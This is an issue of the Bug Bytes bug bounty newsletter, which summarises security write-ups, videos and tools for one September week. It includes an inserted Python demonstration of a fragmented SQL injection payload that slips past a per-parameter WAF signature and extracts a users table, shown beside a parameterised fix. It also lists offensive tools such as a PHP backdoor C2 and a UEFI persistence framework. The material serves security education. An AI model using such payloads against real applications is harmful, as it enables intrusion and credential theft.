Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from 11 to 18 September.
Our favorite 5 hacking items
1. Videos of the week
How to Master FFUF for Bug Bounties and Pen Testing & Everything you need to know about FFUF
Finding Hidden Files and Folders on IIS/.NET (Recon), Hacking IIS (APIs and using BigQuery) (Part 2) & Finding Hidden Files and Folders on IIS using BigQuery
These are two very informative videos with accompanying blog posts. Michael Skelton (@codingo_)’s guide to ffuf is so good that the tool’s creator, @joohoi, is linking to it from the main ffuf repo!
Shubham Shah (@infosec_au) shares cool explanations on bruteforcing IIS hidden files and folders, and leveraging BigQuery (without ruining yourself!).
2. Writeups of the week
$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty (Facebook, $25,000)
When you browse Instagram and find former Australian Prime Minister Tony Abbott’s passport number
Bug bounty amounts aren’t everything, but they’re often an indicator of the seriousness of a vulnerability. Andres Alonso’s (@al0nnso) finding is impressive considering not only the bounty but also the hardened target and his young age. He found an open redirect on Facebook that could be escalated to XSS. WAF bypass was possible by injecting code to change the page’s charset and encoding the XSS payload.
The second writeup is a fun vulnerability disclosure story. @mangopdf found a former Australian Prime Minister’s boarding pass on Instagram and could use it to obtain his passport and phone numbers. What followed was an entertaining crusade to report this without getting arrested.
3. Tool of the week
Graphtage is a command line utility and library for semantically comparing and merging tree-like structures (e.g. JSON, JSON5, XML, HTML, YAML, TOML and CSV). It’s a great tool for diffing files and automating recon data analysis.
4. Non technical item of the week
Hacking on Bug Bounties for Four Years
This is an illuminating read for anyone who is doing bug bounties or aspiring to. @infosec_au shares his past four years’ experience as a part-time bug hunter. This includes the types of bugs he reported, the bounty amount for each, total earnings, his methodology, collaboration experience… Amazing insights into a seasoned bug hunter’s life!
5. Tutorial of the week
Bypassing WAF by Playing with Parameters
This is an introduction to HTTP Parameter Fragmentation, and how it can be leveraged to bypass WAFs and exploit SQL injection. A nice read to get familiar with this technique!
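To make the idea concrete, here is an added example that is not part of the tutorial or of this newsletter. It assumes a constructed SQLite database, a hypothetical signature-based WAF that checks each query parameter on its own (the `waf_blocks` function), and an application that concatenates two parameters into one SQL statement. The fragmented payload puts `UNION` in one parameter and `SELECT` in the other; a comment swallows the SQL that sits between them once the server assembles the query, so no single parameter matches the `union select` signature, yet the assembled statement is a working injection. The parameterised version of the same query is shown beside it to illustrate the fix.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database: a products table the app queries and a
    users table the injection exfiltrates. Not taken from the tutorial."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES (1, 'widget', 10, 'tools'), (2, 'gadget', 20, 'tools');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2');
    """)
    return db


# Hypothetical WAF rule: a signature checked against each parameter value
# in isolation. Inspecting values one at a time is what HPF exploits.
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)


def waf_blocks(params):
    """Return True if any single parameter value matches the signature."""
    return any(SIGNATURE.search(str(v)) for v in params.values())


def vulnerable_search(db, params):
    """Builds the SQL by string concatenation, so both parameters end up
    adjacent in one statement and the fragments can be joined."""
    query = ("SELECT name, price FROM products "
             f"WHERE id = {params['id']} AND category = '{params['cat']}'")
    return db.execute(query).fetchall()


def safe_search(db, params):
    """Parameterised version: values are bound as data and can never become
    SQL tokens, so the fragments are never joined into a statement."""
    query = "SELECT name, price FROM products WHERE id = ? AND category = ?"
    return db.execute(query, (params["id"], params["cat"])).fetchall()


# A classic single-parameter payload: caught by the per-parameter signature.
NAIVE = {"id": "0 UNION SELECT username, password FROM users --", "cat": "tools"}

# The fragmented payload. After concatenation the server sees:
#   ... WHERE id = 0 UNION/* AND category = '*/SELECT username, password FROM users --'
# The /* ... */ comment removes " AND category = '" and the trailing -- removes
# the closing quote, leaving: ... WHERE id = 0 UNION SELECT username, password FROM users
FRAGMENTED = {
    "id": "0 UNION/*",
    "cat": "*/SELECT username, password FROM users --",
}


if __name__ == "__main__":
    db = make_db()
    print("WAF blocks naive payload:     ", waf_blocks(NAIVE))
    print("WAF blocks fragmented payload:", waf_blocks(FRAGMENTED))
    print("vulnerable query returns:     ", vulnerable_search(db, FRAGMENTED))
    print("parameterised query returns:  ", safe_search(db, FRAGMENTED))
```

Running it shows the naive payload blocked, the fragmented one passed through, the concatenated query returning the users row, and the parameterised query returning nothing for the same input. A WAF can only catch this by reasoning about how the back end assembles parameters, which it usually cannot know; the durable fix is binding parameters, not a better signature.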
Other amazing things we stumbled upon this week
Webinars & Webcasts
Slides & Workshop material
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
If you don’t have time
- kb: A minimalist knowledge base manager
- Arsenal: Quick inventory, reminder and launcher for pentest commands
- Mapboxapiscanner: Python script to determine whether a leaked/found Mapbox API Key is vulnerable to unauthorized access by other applications or not
- query-json: Faster and simpler implementation of jq in Reason Native
- nvd-scrapper: Pull data from the national vulnerability database and push it to a GCP bucket
- OneFuzz: A self-hosted Fuzzing-As-A-Service platform by Microsoft
- GKE Auditor: A tool by Google to detect a set of common Google Kubernetes Engine misconfigurations
- LambScan & Offensive Security Testing Using Cloud Tools: AWS Lambda-based port scanner
- wordlist_generator: Unique wordlist generator of unique wordlists
- Tafferugli: Twitter Analysis Framework #OSINT
- Darkshot: Lightshot scraper on steroids with OCR #OSINT
- mzap: Multiple target ZAP Scanning
- Bantam: A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems
- crlfmap: Go tool to find HTTP Splitting vulnerabilities
- MIDNIGHTTRAIN & Intro: A Covert Stage-3 Persistence Framework weaponizing UEFI variables
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
Breaches & Attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 09/11/2020 to 09/18/2020.